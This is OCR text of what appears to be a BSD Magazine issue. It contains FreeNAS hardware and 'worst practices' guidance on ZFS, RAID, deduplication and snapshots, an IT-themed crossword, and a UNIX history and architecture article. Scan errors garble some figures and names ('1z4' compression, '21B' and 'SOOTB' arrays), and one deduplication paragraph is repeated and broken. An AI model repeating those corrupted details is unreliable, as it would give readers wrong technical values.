plied in this model is the fact that there are a 
lot of moving pieces in a storage device (figu- 
ratively, not literally). Although these parts are 
all supposed to work together, the reality is 
that all parts have firmware, many devices re- 
quire drivers, and the potential for there to be 
subtle (or gross) incompatibilities is always 


present. BS 
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Best Practices 


ECC RAM or Not? 


This is probably the most contested issue sur- 
rounding ZFS (the filesystem that FreeNAS 
uses to store your data) today. I've run ZFS 
with ECC RAM and I've run it without. I’ve 
been involved in the FreeNAS community for 
many years and have seen people argue that 
ECC is required and others argue that it is a 
pointless waste of money. ZFS does some- 
thing no other filesystem you'll have available 
to you does: it checksums your data, and it 
checksums the metadata used by ZFS, and it 
checksums the checksums. If your data is cor- 
rupted in memory before it is written, ZFS will 
happily write (and checksum) the corrupted 
data. Additionally, ZFS has no pre-mount con- 
sistency checker or tool that can repair filesys- 
tem damage. This is very nice when dealing 
with large storage arrays as a 64TB pool can 
be mounted in seconds, even after a bad shut- 
down. However if a non-ECC memory module 
goes haywire, it can cause irreparable dam- 
age to your ZFS pool that can cause complete 
loss of the storage. For this reason, | highly 
recommend the use of ECC RAM with 
“mission-critical” ZFS. Systems with ECC 
RAM will correct single bit errors on the fly, 
and will halt the system before they can do 
any damage to the array if multiple bit errors 
are detected. If its imperative that your ZFS 
based system must always be available, ECC 
RAM is a requirement. If its only some level 
of annoying (slightly, moderately...) that you 
need to restore your ZFS system from back- 
ups, non-ECC RAM will fit the bill. 
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How Much RAM is needed? 


FreeNAS requires 8 GB of RAM for the base 
configuration. If you are using plugins and/or 
jails, 12 GB is a better starting point. There's a 
lot of advice about how RAM hungry ZFS is, 
how it requires massive amounts of RAM, an 
oft quoted number is 1GB RAM per TB of stor- 
age. The reality is, it's complicated. ZFS does 
require a base level of RAM to be stable, and 
the amount of RAM it needs to be stable does 
grow with the size of the storage. 8GB of 
RAM will get you through the 24TB range. Be- 
yond that 16GB is a safer minimum, and once 
you get past 100TB of storage, 32GB is rec- 
ommended. However, that’s just to satisfy the 
Stability side of things. ZFS performance lives 
and dies by its caching. There are no good 
guidelines for how much cache a given stor- 
age size with a given number of simultaneous 
users will need. You can have a 21B array 
with 3 users that needs 1GB of cache, and a 
SOOTB array with 50 users that need 8GB of 
cache. Neither of those scenarios are likely, 
but they are possible. The optimal cache size 
for an array tends to increase with the size of 
the array, but outside of that guidance, the 
only thing we can recommend is to measure 
and observe as you go. FreeNAS includes 
tools in the GUI and the command line to see 
cache utilization. If your cache hit ratio is be- 
low 90%, you will see performance improve- 
ments by adding cache to the system in the 
form of RAM or SSD L2ARC (dedicated read 
cache devices in the pool). 
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RAID vs. Host Bus Adapters (HBAs) 


ZFS wants direct control of the underlying stor- 
age that it is putting your data on. Nothing will 
make ZFS more unstable than something ma- 
nipulating bits underneath ZFS. Therefore, 
connecting your drives to an HBA or directly 
to the ports on the motherboard is preferable 
to using a RAID controller; fortunately, HBAs 
are cheaper than RAID controllers to boot! If 
you must use a RAID controller, disable all 
write caching on it and disable all consistency 
checks. If the RAID controller has a pass- 
through or JBOD mode, use it. RAID control- 
lers will complicate disk replacement and im- 
properly configuring them can jeopardize the 
integrity of your volume (Using the write 
cache on a RAID controller is an almost sure- 
fire way to cause data loss with ZFS, to the 
tune of losing the entire pool). 


Virtualization vs. Bare Metal 


FreeBSD (the underlying OS of FreeNAS) is 
not the best virtualization guest: it lacks some 
virtio drivers, it lacks some OS features that 


second part of the article series you can find in the 
«© March 2015 issue (Vol. 09 No. 03 
¥  http://bsdmag.org/download/new-bsd-issue-freena 
| s-a-complete-quide-to-freenas-hardware-design/ 
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make it a better behaved guest, and most im- 
portantly, it lacks full support from some virtu- 
alization vendors. In addition, ZFS wants di- 
rect access to your storage hardware. Many 
virtualization solutions only support hardware 
RAID locally (I’m looking at you, VMware) 
thus leading to enabling a worst case sce- 
nario of passing through a virtual disk on a da- 
tastore backed by a hardware RAID controller 
to a VM running FreeNAS. This puts two lay- 
ers between ZFS and your data, one for the 
Host Virtualization’s filesystem on the datas- 
tore and another on the RAID controller. If you 
can do PCI passthrough of an HBA to a Fre- 
eNAS VM, and get all the moving pieces to 
work properly, you can successfully virtualize 
FreeNAS. We even include the guest VM 
tools in FreeNAS for VMware, mainly because 
we use VMware to do a lot of FreeNAS devel- 
opment. However if you have problems, there 
are no developer assets running FreeNAS as 
a production VM and help will be hard to 
come by. For this reason, | highly recommend 
that FreeNAS be run “On the Metal” as the 
only OS on dedicated hardware. 
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FreeNAS: A Worst Practices Guide 


by Mark VonFange 


There are many best practices guides for managing storage 
solutions out there, but a lot of how you administer your 
storage depends on your specific use case and what you’re 
trying to accomplish. While we have created a best prac- 
tices for FreeNAS, we also decided to take a look at what 
you don’t want to do; things that will leave you hurting el- 
ther immediately or down the road. 


In that spirit, we've put together a worst prac- 
tices guide for FreeNAS based on years of ex- 
perience with systems in the field. The easiest 
way to avoid these pitfalls is to simply pur- 
chase a TrueNAS system from the experts at 
iXsystems, who can help set up your systems 
for optimal performance and functionality. For 
those who prefer the DIY approach, here are 
some things to look out for when setting up 
and managing your own FreeNAS system. 


Using Hardware RAID with ZFS 


When setting up a RAID array, common knowl- 
edge says that hardware RAID is preferable 
to software RAID. This is something of a mis- 
conception as all RAID is software RAID. If 
youre using a hardware RAID controller, it 
has its own independent operating system 
that communicates with your disks and often 
has caches to improve read and write perform- 
ance. This was a good idea in the distant 
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past, and improved RAID performance sub- 
stantially, but operating systems and the hard- 
ware they run on have come a long way since 
those days. 


FreeNAS uses the ZFS file system and is de- 
signed to communicate directly with your 
disks using its own volume manager. ZFS in- 
cludes a sophisticated yet efficient strategy for 
providing various levels of data redundancy, 
including the mirroring of disk and the “ZFS” 
equivalents of hardware RAID 5 and higher 
with the ability of losing up to three disks in an 
array. If a given set of disks is provided to ZFS 
using a hardware RAID card, ZFS will not be 
able to efficiently balance its reads and writes 
between them or rebuild only the data used 
by any given disk. Hardware RAID cards typi- 
cally rebuild disks in a linear manner from be- 
ginning to end without any regard for their ac- 


tual contents. 
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The “one big disk” that hardware RAID cards 
provide limits some of ZFS’s advantages, and 
the read and write caches found on many 
hardware RAID cards are how risk gets intro- 
duced. ZFS works carefully to guarantee that 
every write it receives from the operating sys- 
tem is on disk and checksummed before re- 
porting success. This strategy relies on each 
disk reporting that data has been successfully 
written, but if the data is written to a hardware 
cache on the RAID card, ZFS is constantly 
misinformed of write success. This can work 
fine for some time but in the case of a power 
outage, catastrophic damage can be done to 
the ZFS “pool” if key metadata was lost in tran- 
sit. Such failures have been known to carry 
five-figure price tags for data recovery serv- 
ices. Unlike hardware RAID, you will not suffer 
from data loss that can occur from interrupted 
writes or corrupt data returned from a hard- 
ware cache with ZFS. 


Finally, most hardware RAID cards will mask 
the S.M.A.R.T. disk health status information 
that each disk provides. Very simply, each 
disk is connected to the hardware RAID con- 
troller card and the disks become invisible to 
the standard S.M.A.R.T. monitoring — utility 
“smartctl”’. Without access to this information, 
the user is left unaware of classic warning 
signs of impending disk failure, like reallo- 
cated sector count or unusually high tempera- 
ture. Even the time it takes to run smartctl can 
be indicative of an impending problem. 


While some hardware RAID cards may have 
a “pass-through” or “JBOD” mode that simply 
presents each disk to ZFS, the combination of 
the potential masking of S.M.A.R.T. informa- 
tion, high controller cost, and anecdotal evi- 
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dence that any RAID mode is about 5% 
slower than non-RAID “target” mode results in 
zero reasons for using a hardware RAID card 
with ZFS. 


Long story short, using hardware RAID on Fre- 
eNAS can lead to anything from corrupted 
writes to fatal errors that require you to invest 
in costly data recovery services. 


Setting up Deduplication without Adequate 
Planning 


Deduplication is a much-desired feature for 
storage solutions. On any given system, more 
than half your data may be duplicates of data 
elsewhere in your storage pool, causing a 
greater storage consumption. Deduplication 
reduces capacity requirements significantly 
and improves performance by tracking dupli- 
cate data with a ‘deduplication table’, eliminat- 
ing the need to write and store duplicate infor- 
mation. ZFS stores this table on disk, which 
means that, if the host has to refer to the on- 
disk tables regularly, performance will be sub- 
stantially reduced because of the slower 
speeds of standard spinning disks. 


This means you need to plan to fit your entire 
deduplication table in memory to avoid major 
performance and, potentially, data loss. This 
generally isn't a problem when first setting up 
deduplication, but as the table grows over 
time, you may unexpectedly find its size ex- 
ceeds memory. will be able to import back to 
memory. Unfortunately, this can sometime 
take days to perform, and, if your hardware al- 
ready has maxed out its memory capabilities, 
would require migrating the disks to a whole 


new system to access the data. 
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This splits the deduplication table between 
memory and hard disk, turning every write 
into multiple reads & writes, slowing your per- 
formance down to a crawl. In an enterprise en- 
vironment, this can cause significant productiv- 
ity decreases and angry staff workers. If this 
happens, the best solution is to add more sys- 
tem memory so that the pool will be able to im- 
port back to memory. Unfortunately, this can 
sometime take days to perform, and, if your 
hardware already has maxed out its memory 
capabilities, would require migrating the disks 
to a whole new system to access the data. 


The general rule of thumb here is to have 5 
GB of memory for every 1TB of deduplicated 
data. That said, there may be instances where 
more is required, but you will need to plan to 
meet the maximum potential memory require- 
ments to avoid problems down the road. To 
get a more precise estimate of the required 
memory for deduplication, do the following: 
run the ‘zdb -b (pool name)’ command for the 
desired pool to get an idea of the number of 
blocks required, then multiply the ‘bp count’ by 
320 bytes to get your required memory. If it’s 
less than 5GB, still use the 5GB per terabyte 
of storage rule. If it's higher, go with that num- 
ber per terabyte. 


For must use cases, it is recommended to just 
utilize 1z4 compression for data consumption 
Savings, as there's no real processing cost. In 
fact, due to of the advances in CPU speeds, 
compression actually improves disk perform- 
ance because writing uncompressed data to 
disk takes longer than compressed data. To 
be safe, always use compression instead of 
deduplication unless you know exactly what 
you are doing. 
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Striping Without Redundancy 


ZFS offers all the typical forms of RAID redun- 
dancy and more, including ZFS striping (RAID 
0), ZFS mirroring (RAID 1), RAID 10, and 
RAID-Z levels that allow for 1, 2 or 3 disk fail- 
ures without affecting your storage pool. ZFS 
striping can speed up your performance by 
spreading out writes across multiple disks and 
combining all your disks into one large pool. 
This can seem appealing to the new user be- 
cause of its maximum speed and capacity, but 
if any of your disks has a failure, your entire 
pool will be lost. While, with secondary stor- 
age or non-critical data, this may not prove to 
be a catastrophic loss, losing your storage 
pool is always a big deal and it’s always rec- 
ommended to configure your storage pool 
with some level of redundancy. 


Using a SLOG for asynchronous write sce- 
narios 


The ZFS filesystem can tier cached data to 
help achieve sizable performance increases 
over spinning disks. Users can set up flash- 
based L2ARC read cache and SLOG (Sepa- 
rate ZFS Intent Log, sometimes called a ZIL) 
‘write cache’ devices. While an L2ZARC read 
cache will soeed up reads in most use cases, 
the SLOG only speeds up synchronous 
writes. 


The ZIL caches writes to guarantee their com- 
pletion in the case of a power failure or sys- 
tem crash. The ZIL normally exists as part of 
the ZFS pool, but with a SLOG, it resides on a 
separate, dedicated device. This speeds up 
performance by batching data together for syn- 


chronous writes for more efficiency. 
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These performance gains help with database 
operations, NFS operations such as virtualiza- 
tion where the operating system explicitly re- 
quests synchronous writes. If you aren't using 
something that is Known to use synchronous 
writes like NFS or databases, chances are 
your SLOG will not help performance. A poten- 
tial solution here is to set your pool to “sync=a- 
lways’. This ensures that every write goes to 
the write cache, improving write performance. 


Too Many Snapshots 


Snapshots give users the ability to rollback to 
previous system states to retrieve lost files or 
go back to a configuration that worked prop- 
erly, while only saving the file system’s blocks 
that have changed since the last snapshot. 
This results in near instant snapshot tasks. 
snapshot tasks can be set for regular inter- 
vals and stay stored as long as desired. 


While ZFS generally boasts that you can save 
unlimited snapshots, there are some practical 
limits to this. Some users may decide to have 
periodic updates every few minutes for multi- 
ple datasets and make their lifetime indefinite. 
Taking one snapshot every five minutes will 
require over 100,000 snapshots each year, 
creating some substantial performance loss. If 
you have thousands of snapshots, this means 
you will have thousands of blocks accumulat- 
ing. Depending on the capacity of the disk, 
this can cause slowdowns when you list snap- 
shots, possibly across the entire ZFS pool. 


Upgrading your FreeNAS version with a 
full boot device 


FreeNAS makes upgrading to the latest ver- 
sion, switching between nightly and release 
versions and rolling back to earlier versions 
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very easy by storing snapshots of the OS on 
your boot device. However, if you fill your boot 
device beyond its capacity, updating your OS 
version may result in the upgrade process 
mysteriously failing. Fortunately, FreeNAS will 
give you an alert when your boot device ex- 
ceeds 80% capacity, so you should know 
when your boot drive is getting full and delet- 
ing version snapshots is easy to do. 


Just go into your System>>Boot tab and se- 
lect the image you would like to delete and 
click on the delete button on the bottom of the 


page. 
Rebuilding your ZFS array incorrectly 


FreeNAS gives users the ability to set up ZFS 
arrays and resilver disks in the case of a drive 
failure. If you remove the wrong disk and try 
to rebuild, you can end up losing your entire 
pool. It is important to remember that the 
physical arrangement of the drives on your 
hardware may not correspond to your device 
numbers (adaO, ada1, ada2, etc.). To counter 
this, we recommend writing down the serial 
numbers for each disk along with which slot 
they're in, as the GUI will give you associated 
serial numbers in the case of a drive failure. 


In addition, if you try to rebuild a ZFS array 
with a disk that is too small, your rebuild will 
fail. This can happen if you use a smaller ca- 
pacity drive, say a 2TB instead of a 31B, but it 
can also happen between different drives of 
the same listed capacity. Different drive manu- 
facturers may create each drive with a slightly 
different total capacity, making the effective ca- 
pacity of your replacement drive slightly 
higher or lower than the disk you replaced. 
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If the capacity is slightly higher, your rebuild 
will succeed, but if it is slightly lower, it will 
not. 


lf a failure occurs on drives with the same 
listed capacities, there is a workaround avail- 
able from the FreeNAS web user interface. 
Just access your system>>advanced menu 
and temporarily change your Swap Size to 0 
before rebuilding. Once your rebuild is com- 
plete, make sure to change it back, though 
(usually the default of 2GiB). The extra 2GiB 
should accommodate any small difference in 
drivef capacity but do try to use identical 
drives whenever possible. 


Other Issues to Watch For 


There are a couple of common issues with Ac- 
tive Directory that can cause problems. The 
first is if the system clock is out of sync. Make 
sure youre using a time server as AD/CIFS is 
very time sensitive. Second, having the do- 
main name entered incorrectly can cause 
your Active Directory to have big problems. 
Ideally, your domain should have a reverse 
DNS entry, which you can determine easily 
enough: 


https://www.google.com/search?q=dns+rever 
set+tlookup&ie=utt-8&o0e=utf-8#q=reverse+dns 


Also, whenever possible, try not to mix shar- 
ing services on the same dataset. Differences 
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in permissions between Unix (NFS) and Win- 
dows (CIFS) sharing formats can create some 
conflicts, so try to avoid this when you can. If 
you need users from multiple operating sys- 
tems to have access to the same datasets, 
CIFS/SMB its your best choice. If you need to 
have multiple sharing protocols, you will want 
to separate your datasets between NFS & 
CIFS/SMB. 


Finally, filling your storage pool over 80% of 
capacity will cause degraded performance. 
Try to plan your storage pool size to accommo- 
date for this. 


Conclusion 


When deploying any server or storage sys- 
tem, setting up your system properly can help 
prevent headaches and even catastrophes 
down the road. As they say, an ounce of pre- 
vention is worth a pound of cure. While there 
are many aspects to setting up any given use 
case, this guide should avoid most of the ma- 
jor pitfalls people run into while setting up 
their FreeNAS storage. And if youre looking 
for even greater assurance, visit 


www.ixsystems.com/truenas, call us at 1-855- 
GREP-4-IX or email us at 


sales@ixsystems.com, for information on our 
qualified, professionally supported TrueNAS 
appliances. We look forward to hearing from 
you! 
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New Years Eve Crossword 


Across 53 Manufacturer of old modems in the UK 
55 Roman for 2 
1 This magazine 
96 When debugging, something you do ina 
program 


3 MS CLI + more 


8 Programmer's outline code 58 Acard deal running for president 


12 Bill Gates' old employer 60 Famous female coder 


19 Abbr. Fecal matter or retailer's IT system 61 Not the power button 


20 UK spy agency 64 Old disk bus 


21 Abbr. Fecal matter or retailer's IT system 65 American greeting, or in the UK a string 


23 Code monkey toy duplicated 

2/ What your employer says you are 66 Small semiconductor chip 

29 Essential to the Internet 67 You don't want this on a DC power line 
32 First name of the lover of Hitler 69 This will filter 67 across 

35 Abbr. Forum Off topic 70 Major international news feed 

36 Adegree that will not get you far in IT 72 Read a Tile in “nix without a dog 

38 Abbr. Signal to noise ratio 74 Programming language 


39 Abbr. UK process to check employees of 75 The life of or 22/7 


20 across 76 User interface 


41 Abbr. Old fashioned semiconductor ae Funbde ened ten 


42 Programming loop especially a function 81. Runs on hardware 


46 What they really want to do to us 85 MS config file 


7 Sen eeen 8/ MS O/S or security risk 


49 Part of TCP ora legal term 89 First digit 


90 Where you would find a public micro- 
wave transmitter 


90 35 across 


91 Print format 
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95 


96 


97 


98 


99 


100 


101 


102 


103 


105 


106 


107 


108 


109 
tion 


110 


112 
UK 


114 


115 


117 


118 


Non — procedural programming 

A TTY message from a long time ago 
What you feel when it all works 
Corpulent file system 

Abbr. download 

MS library 

The Darknet 

Pre Euro Italian currency 

Old IBM architecture 

Abbr: Terminal Adapter 

Logic — one or the other 

Standards mark — often forged 

We supposedly descended from them 
Abbr. The management of information 


Most people confuse this with informa- 


Essential to IT ops 


“nix editor used for scrubbing sinks in the 


Abbr. Forum, gone for a coffee, etc. 
OOPS language from far away places 
Newer drive bus 


Coat, burger or network hardware ad- 


dress 


119 


Printer file format 


121 


124 


125 


126 


cally 


128 


130 


132 


133 


135 


137 


138 


141 


143 


Graphics format — all lined up with nodes 
IT industry was built on this 
Slang Yes 


An aircraft taking off and landing verti- 


UK Astronomical Society 

US alphabet spy agency 

Old computer that emerged from a lamp 
21 across 

A packet only has a short one of these 
Google is automating these 

97 across 

The acid test 


Any image that consists of distinct 


straight or curved lines 


147 


148 


149 


150 


code 


151 


152 


154 


156 


158 
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You ain't getting online without this guy 
A neat hypervisor 
85 across 


Game man missing forename or telco 


Crude cypher 

Form of graphics 

Base human cell 

Data protection using multiple disks 


Abbr. Teletype 
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New Years Eve Crossword 


160 Machine instruction, start 


161 Branched cable or play with a ball and a 
long stick on grass 


163 IT related injury to the wrist 


164 Abbr. Bus type by technology removing 
Staff from from transit vehicle 


165 Essential valve circuit 

166 MS library 

16/7 Non-numeric Indian bread 
169 JS missing it's . first name 


171 Programmers term to reduce a file or 
some data 


173 “nix moggie reading a file 
176 Kill an unwanted variable 
178 Famous electrical genius 
182 Old fashioned Ethernet 
185 UK car tyre pressure 


186 UK slang for the common man, users, 
workers 


18/7 MS tablet 

189 Two parallel processors 

190 Largest size packet or frame 
192 You are this 

194 IBM PC architecture 

195 Abbr. Frequency of sound 


196 Abbr. Forum, off topic 
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197 Abbr. A type of top down parser 

198 Abbr. Streams editor 

203 Crude plural of TOR network 

205 Asum of money that is owed or due 
20/7 Processor instruction 


209 Encryption standard recently abused by 
hackers 


211 IBM 8 bit encoding scheme 
212 Lies, damned lies and all that 


215 Astraightforward machine parsable data 
serialization format 


216 Corporate father of computing 
219 1970's synthesizer 
222 Abbr. Command line 


224 African magic performed on computers 
repeatedly? 


225 More standard 7 bit version of 211 
across 


228 We serve this now and are one at the 
same time 


231 Fast disk bus, pretty much succeeded 
232 Javascript, Not a Number 

234 Gas used to subdue political protesters 
236 Abbr. Input / output 

23/ IT version of the platters 


238 Abbr. International System of Units 
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239 Male appendage — see 239 and 243 10 UK mobile supplier 


down 
11. Abbr. Operations 


242 Abbr. Not something you want in a 12v 


power supply 12 Abbr. UK certificate of vehicle worthiness 


244 Englishman's castle defences 13 Abbr. Information systems 


247 Having no skill 18 Abbr. Intelligence 


249 UK music giant circa 1960's 19 Pre IT writing too! 
200 (2,1./) Words muttered after a restore 22 This Is a 22 down .... 
failed 24 Power / current 
203 Logic, high, low or in-between 25 CPU 
204 UK mobile supplier now taken over —a 26 Vermin, software used by hackers 
bit fruity 
2/  \|T conglomerate favoured by UK govern- 
25/ Newbie ment 
298 Variable resistor or cannabis 28 Abbr. Anti-depressant drug 
209 You should have a few of these or you 30 Randomness — well sort of 


will be made this 
31 Log file of errors 


34 Abbr. Audio Visual 


Down | | 
3/ Abbr. UK electronics supplier 
40 Animal doctor checks UK intelligence op- 
2 Resistance to, or protection from, harm erative for insecurity? 
4 Abbr. Display on-screen 44 Alternative to Vi or VIM 
5 Mythical alien 45 Aprovince of Kampong 
6 Abbr. Executable or magazine 4/7 Abbr. Pakistan technology university 
7 Slang: Elite 91 Abbr. After Christ 
8 Abbr. Shove something in a register 02 Abbr. South Africa 
9  See6down 04 Snake or adder 
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Of 


New Years Eve Crossword 


Stoic politician and statesman in the Ro- 


man Republic 


09 


62 


63 


68 


71 


76 


Tf 


80 


82 


83 


86 


88 


92 


94 


96 


97 


102 


111 


113 


120 


screen resolution 

Hackers robot 

UK aviation governing body 

MS Spanish embedding? 

MS XP version 

(5,3,0) Where cables and pipes often live 
Essential tool to turn .c into a binary 
1960's record — not a 45 

Layer of grease or oil 

Fantastic 1980's word processor 
See 236 across 

IT / Systems wisdom circa 1970's 
cave to a resistor (Assembler) 
English CEO's secretary 

Browser Java — not quite 

Web dialogue or criminal history 
UK car rescue club 

Pulse from A bomb 

Million (a bit less really) 


otandard procedure or a piece of gravy 


soaked bread 


122 Abbr. Terminal Adapter 


123 Abbr. Reset 
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126 


12/7 


128 


129 


134 


140 


142 


144 


145 


146 


148 


155 


159 


162 


164 


166 


170 


172 


174 


175 


176 


177 


180 


181 


Abbr. Visual Display Unit 

Abbr. Forum, laughs out loud 

Cli — delete file 

Elderly disk bus 

Abbr. Telephony protocol 

8 of these to a byte 

US education exam — the cat does it 
Abbr. Network storage 

Abbr. Memory — no writes 

Movie just released 

Man with additional chromosome 
Abbr. Standard units 

Christmas 

Abbr. Design by computer 

Opposite of off 

Big log file 

Turn something on — on top of stage? 
Abbr. Kilo bits per second 

Terminal response - All right 

Abbr. Ordinal 

Let go or release 

Abbr. Your mileage may do this 

An ability to accurately assess situations 


Abbr. Freedom foundation 
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New Years Eve Crossword 


182 Elderly Unix, almost defunct 
183 IBM EBCDIC equivalent 
184 Zero in asports game 


186 When a spacecraft launched from Earth 
into a lunar orbit is nearest the moon 


188 Grid of co-ordinates in a display space 


192 Abbr. Thousand mega per second (or al- 
most) 


193 Bad spelling of not defined 
198 Abbr. Streams editor 

204 Abbr. On-line learning 

206 Transistor material 

208 Abbr. Operating system 
210 Study of valid reasoning 


21/ Major firewall vendor 


——— ee ant ~ = ee 


Editors Word: 


job! 
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218 Amilitary appliance or to dive? 

228 Abbr. Chief Technology Officer 

229 Abbr. Encrypted shell 

230 Broken, truncated and transposed? 


235 Definitely not a hacker but might drive an 
old Volvo 


23/ Abbr. Detonator 
239 Lots of this on the Internet 


243 Lots of these on the Internet — See 239 
down and 239 across 


202 Abbr. Data Processing 
293 Abbr. UK Street 


204 Fictional planet that lies at the center of 
the DC Comics universe 


A huge THANK YOU to Rob Somerville for this crossword. Great 


Dear Readers, | hope you will enjoy it. Have fun while solving 
the clues! 
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UNIX Basics 


by Samanvay Gupta 


UNIX United is architecture for a distributed system based 

on UNIX. Any program written for a normal UNIX system can 

be transparently extended to exploit the richer environment 

of UNIX United. As it relies on having a UNIX system be- 
neath it, the implementation of UNIX United, called the New- 
castle Connection. This paper explains the basic semantics 

of UNIX United and is followed by that of the architecture im- 
plied by the protocol between components in a UNIX United 

system, network basics and of a software structure appropri- 
ate to the architecture and the protocol. 


UNIX United and the Newcastle Connection 
were first described in [1], which contained a 
quite extensive survey of work on UNIX- 
based distributed systems and comparisons 
of the different approaches that have been 
adopted. No attempt is made to repeat such a 
survey in the present paper. Since that time, 
the two notions of UNIX United as an architec- 
ture and the Newcastle Connection as an im- 
plementation have become more distinct in 
our own minds, and both have evolved consid- 
erably in response to our continuing design 
and implementation efforts. 


The purpose of this paper is twofold: to de- 
scribe the semantics and architecture of UNIX 


United in some detail and to discuss the cur- 
rent state of our design and implementation. A 
UNIX United system is composed of a num- 
ber of component UNIX systems connected 
by one or more communications media. In ar- 
chitectural terms, UNIX United is a loosely 
coupled collection of components for a num- 
ber of reasons: it should be feasible to use 
both fast and slow communications media, ad- 
ministrators of a component should retain 
their autonomy in the distributed system, and 
any given UNIX United system should be ca- 
pable of encompassing an arbitrary number of 
components. 
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UNIX are extended in UNIX United. Section 
IV describes the software structures associ- 
ated with the architecture, both in terms of our 
implementation (the Newcastle Connection), 
anWhile UNIX United is intentionally loosely 
coupled in the senses described above, it 
paradoxically presents an extremely inte- 
grated view to its users; that of a single, albeit 
very large, UNIX system in which all of the nor- 
mal UNIX system calls and programs exhibit 
exactly the same behavior when executed in 
the UNIX United environment as when exe- 
cuted in the environment of a single, isolated 
component. The result is that UNIX United is 
recursively structured [2]: the functionality of 
the distributed system as a whole is identical 
to that of its components. This not only has 
some interesting consequences in terms of 
the design of distributed computing systems, 
but it also implies that all existing software in- 
vestments in UNIX can be retained in UNIX 
United, without necessarily requiring any modi- 
fication to their source code or that of the 
UNIX kernels on the component machines. 
(As distributed commercially, the Newcastle 
Connection consists essentially of a replace- 
ment for the C language system call library, 
and thus programs only need to be relinked to 
be used in the UNIX United environment. How- 
ever, we and others have also created UNIX 
United systems by installing the Newcastle 
Connection software below the physical ma- 
chine kernel boundary, just “on top of the es- 
sentially unmodified kernel. In this case, no 
change whatever is required to existing pro- 
grams. Clearly, this also implies that the 
users perception of UNIX United is identical 
to his perception of UNIX itself; the advan- 
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tages of this cannot be overstated. In Section 
Il, we discuss the motivation and basic seman- 
tics of UNIX United in more detail. Section Ill 
discusses the architecture of UNIX United, or 
precisely how the semantics of d in terms of 
the remote system call protocol which is used 
between various processes on UNIX ma- 
chines in a UNIX United system. 


History Of Unix 


The Unix operating system found its begin- 
nings in MULTICS, which stands for Multi- 
plexed Operating and Computing System. 
The MULTICS project began in the mid-1960s 
as a joint effort by General Electric, Massachu- 
setts Institute for Technology and Bell Labora- 
tories. In 1969, Bell Laboratories pulled out of 
the project. One of Bell Laboratories people 
involved in the project was Ken Thompson. 
He liked the potential MULTICS had, but felt it 
was too complex and that the same thing 
could be done in simpler way. In 1969, he 
wrote the first version of Unix, called UNICS. 
UNICS stood for Uniplexed Operating and 
Computing System. Although the operating 
system has changed, the name stuck and 
was eventually shortened to Unix. 


Ken Thompson teamed up with Dennis 
Ritchie, who wrote the first C compiler. In 
1973, they rewrote the Unix kernel in C. The 
following year, a version of Unix Known as the 
Fifth Edition was first licensed to universities. 
The Seventh Edition, released in 1978, 
served as a dividing point for two divergent 
lines of Unix development. These two 
branches are known as SVR4 (System V) and 
BSD. 


BSD 


MAGAZINE 


Ken Thompson spent a year’s sabbatical with 
the University of California at Berkeley. While 
there he and two graduate students, Bill Joy 
and Chuck Haley, wrote the first Berkeley ver- 
sion of Unix, which was distributed to stu- 
dents. This resulted in the source code be- 
ing worked on and developed by many differ- 
ent people. The Berkeley version of UNIX is 
known as BSD, Berkeley Software Distribu- 
tion. From BSD came the vi editor, C shell, 
virtual memory, Sendmail, and support for 
TCP/IP. 


For several years SVR4 was more conserva- 
tive, commercial, and well supported. Today, 
SVR4 and BSD look very much alike. Proba- 
bly the biggest cosmetic difference between 
them is the way the ps command functions. 


What Is Unix? 


UNIX is a powerful computer operating sys- 

tem originally developed at AT&T Bell Labo- 

ratories. It is very popular among the scien- 

tific, engineering, and academic communities 

due to its multi-user and multi-tasking environ- 
ment, flexibility and portability, electronic mail 
and networking capabilities, and the numer- 
ous programming, text processing and scien- 
tific utilities available. It has also gained wide- 
spread acceptance in government and busi- 
ness. Over the years, two major forms (with 
several vendor's variants of each) of UNIX 
have evolved: AT&T UNIX System V and the 
University of California at Berkeley's Berkeley 
Software Distribution (BSD). This document 
will be based on the SunOS 4.1.3 U1, Sun’s 
combination of BSD UNIX (BSD versions 4.2 
and 4.3) and System V because it Is the pri- 
mary version of UNIX available at Rice. Also 
available are Solaris, a System V based ver- 
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sion, and IRIX, used by Silicon Graphics ma- 
chines. 


Unix Basics — Structure 


Figure 1. UNIX Structure. 


The main concepts that unite all versions of 
UNIX are the following four basics: 


¢ Kernel: The kernel is the heart of the operat- 
ing system. It interacts with hardware and 
most of the tasks like memory management, 
task scheduling and file management. 


Shell: The shell is the utility that processes 
your requests. When you type in a com- 
mand at your terminal, the shell interprets 
the command and calls the program that 
you want. The shell uses standard syntax 
for all commands. C Shell, Bourne Shell and 
Korn Shell are most famous shells which are 


available with most of the UNIX 


variants. 
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¢ Commands and Utilities: There are various 
command and utilities which you would use 
in your day to day activities. co, mv, cat and 
grep, etc. are a few examples of commands 
and utilities. There are over 250 standard 
commands plus numerous others provided 
through 3rd party software. All the com- 
mands come along with various optional op- 
tions. 


¢ Files and Directories: All data in UNIX is 
organized into files. All files are organized 
into directories. These directories are organ- 
ized into a tree-like structure called the file 
system. 


Directory Structure 


The UNIX system is set up as a tree hierar- 
chy. At the top of the tree is the root. The root 
is represented by the slash character. Off of 
the root are branches of the tree. The 
branches are directories. 


Files or directories can be off the tree. 


Design: An Extensible Kernel 


Early in its development, UNIX supported the 
notion of objects represented as file descrip- 
tors with a small set of basic operations on 
those objects (e.g., read, write and seek) [3]. 
With pipes serving as a program composition 
tool, UNIX offered the advantages of simple 
implementation and extensibility to a variety of 
problems. Under the weight of changing 
needs and technology, UNIX has been modi- 
fied to provide a staggering number of differ- 
ent mechanisms for managing objects and re- 
sources. In addition to pipes, UNIX versions 
now support facilities such as System V 
streams, 4.2 BSD sockets, pty’s, various 
forms of semaphores, shared memory and a 
mind-boggling array of IOCtl operations on 
special files and devices. The result has been 
scores of additional system calls and options 
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Workstation 


Figure 3. Network scheme. 


MAGAZINE 


[...] with less than uniform access to different 
resources within a single UNIX system and 
within a network of UNIX machines. As the 
complexity of distributed environments and 
multiprocessor architectures increases, it be- 
comes increasingly important to return to the 
original UNIX model of consistent interfaces 
to system facilities. Moreover, there is a clear 
need to allow the underlying system to be 
transparently extended to allow user-state 
processes to provide services which, in the 
past, could only be fully integrated into UNIX 
by adding code to the operating system ker- 
nel. Mach takes an essentially object-oriented 
approach to extensibility. It provides a small 
set of primitive functions designed to allow 
more complex services and resources to be 
represented as references to objects. The indi- 
rection thus provided allows objects to be arbi- 
trarily placed in the network (either within a 
multiprocessor or a workstation) without re- 
gard to programming details. The Mach kernel 
abstractions, in effect, provide a base upon 
which complete system environments may be 
built. By providing these basic functions in the 
kernel, it is possible to run varying system con- 
figurations on different classes of machines 
while providing a consistent interface to all re- 
sources. The actual system running on any 
particular machine is a function of its servers 
rather than its kernel. 


The Mach kernel supports four basic ab- 
